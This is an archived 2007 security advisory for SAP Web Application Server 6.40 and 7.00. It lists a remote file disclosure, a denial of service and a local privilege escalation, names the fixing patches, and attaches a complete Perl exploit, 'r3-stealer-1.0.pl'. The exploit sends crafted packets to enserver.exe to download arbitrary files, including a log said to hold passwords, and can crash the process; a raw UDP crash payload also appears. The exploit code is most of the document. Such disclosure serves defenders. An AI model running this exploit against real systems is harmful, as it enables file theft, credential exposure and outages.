Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: c07-2270.htm

SAP WebAS 6.40 and 7.00 (technical details) multi vulns



Multiple vulnerabilities in SAP WebAS 6.40 and 7.00 (technical details)
Multiple vulnerabilities in SAP WebAS 6.40 and 7.00 (technical details)




--=-3UKOL2Np1lsHLgwj2QYp
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

 
       Multiple vulnerabilities in SAP Web Application Server
                        Technical details


Application : SAP Web AS 6.40 < patch 136 and 7.00 < patch 66
Platform : All platforms (except the third vulnerability)
Impacts : Remote file disclosure, remote DoS, local privilege escalation
Release Date : 8 February 2007
Author : Nicob 

Vulnerabilities technical details :
==================================
1) A remote file disclosure vulnerability allows reading any file to
which the user that the SAP Web Application Server is running as had
access. Under Windows, the service runs by default under the
SAPServiceJ2E account. This account is member of the local administrator
group.

Exploit : use "r3-stealer-1.0.pl" (attached)

Note : Absolute paths can be used, so "C:\boot.ini" and "\\10.11.12.13
\share\image.jpg" are both OK.

2) A remote denial of service allows crashing the enserver.exe process.

Exploit : send "\x72\xfe" on port UDP/64999

3) A local privilege escalation vulnerability allows any local user to
use the file disclosure vulnerability to access an user-controlled
process via a named pipe and impersonate as user SAPServiceJ2E. The
exploitation is possible only on Windows 2000 pre-SP4, Windows XP
pre-SP2 and Windows NT.

Exploit : use "r3-stealer-1.0.pl" (attached) and "tac0tac0.c" [1]

Solutions :
==========
Apply patch 136 or newer for version 6.40
Apply patch 66 or newer for version 7.00

Note : the mentioned patch level refers to the enqueue server
More details can be found in SAP notes 948457 and 959877

[1] : http://security.nnov.ru/files/tac0tac0.c 

Nicob

--=-3UKOL2Np1lsHLgwj2QYp
Content-Disposition: attachment; filename=r3-stealer-1.0.pl
Content-Type: application/x-perl; name=r3-stealer-1.0.pl
Content-Transfer-Encoding: 7bit

#!/usr/bin/perl -w

##
## SAP 'enserver.exe' file downloader
## Tested on "SAP Web Application Server Java 6.40" (eval DVD)
## Found & coded by Nicob
##
## The downloaded file is limited to the first 32 kilobytes
## Usual port : TCP/3200+SYSNR
## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 "c:\\boot.ini"
##
## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) :
## "\\\\your_box\\pipe\\your_pipe" => get Local Admin (SAPServiceJ2E)
## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp 
##
## File parameter :
##	C:\boot.ini
## 	\\10.11.12.13\share\image.jpg
##	..\..\..\..\..\..\Documents and Settings\All Users\Application Data\sapdb\wa\httpreq.log (contains passwords !)
##

# Init

use strict;
use IO::Socket;

my $verbose = 0;
# Set this to anything not null to crash the process
my $crash = "";

my $socket;
my $reply;

$|=1;

# Get arguments

if (($#ARGV<2) or ($ARGV[0] eq "-h")) {die "Usage: $0    ()\n";}
my $host=$ARGV[0]; 
my $port=$ARGV[1]; 
my $filename=$ARGV[2]; 
my $output=$ARGV[3]; 

# Calculate variables

my $lg = length($filename);
my $tag1 = sprintf('%x', 0x4F + $lg);
my $tag2 = sprintf('%x', 0x20 + $lg);

# Show banner

print "#####################################################################\n";
print "### SAP 'enserver.exe' file downloader\n";
print "### Downloading '$filename' from '$host'\n";
print "#####################################################################\n\n";

# Define the packets

my $packet1 	"0000005dabcde123000000000000005d0000005d06010000000000060000000000040000000000010004000000000003".	# Static
	"5f6e69636f625f6e69636f625f6e69636f62315f".								# ASCII string : "_nicob_nicob_nicob1_" 
	"00000000020000003b0000000500000002000000060000000400000001";						# Static

my $packet2 	"000000". $tag1. "abcde12300000001000000". $tag1 ."000000". $tag1 .
	"03000000454e430001010000234541410100000013030000000000234541450001000000". $tag2 .
	"0000000000007d00000000000000000000000000". unpack("H*",$filename) . $crash ."000023454144";		# Crash if bad filename length

# Create the socket

$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port)
		|| die "Connection refused at [$host:$port]";

# Send the two packet

print $socket pack("H*",$packet1);
print $socket pack("H*",$packet2);

sleep 2;

# Read and display response

recv($socket,$reply,150000,MSG_PEEK);
if ($reply =~ /^(.*)#EAD(.*)$/s) {
	print "File received !\n";
	if ((!defined($output)) or ($output eq "")) {
		print "\n===========================================\n";
		print $2;
		print "\n===========================================\n";
	} else {
		open(OUT, "> $output") || die "Can't open $output ($0)";
		print "File saved as '$output'\n";
		print OUT $2;
		close(OUT);
	}
} else {
	print "Problem interpreting reply :-(\n";
}

# Close the socket

print "\nThe end ...\n";
close $socket;



--=-3UKOL2Np1lsHLgwj2QYp--



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH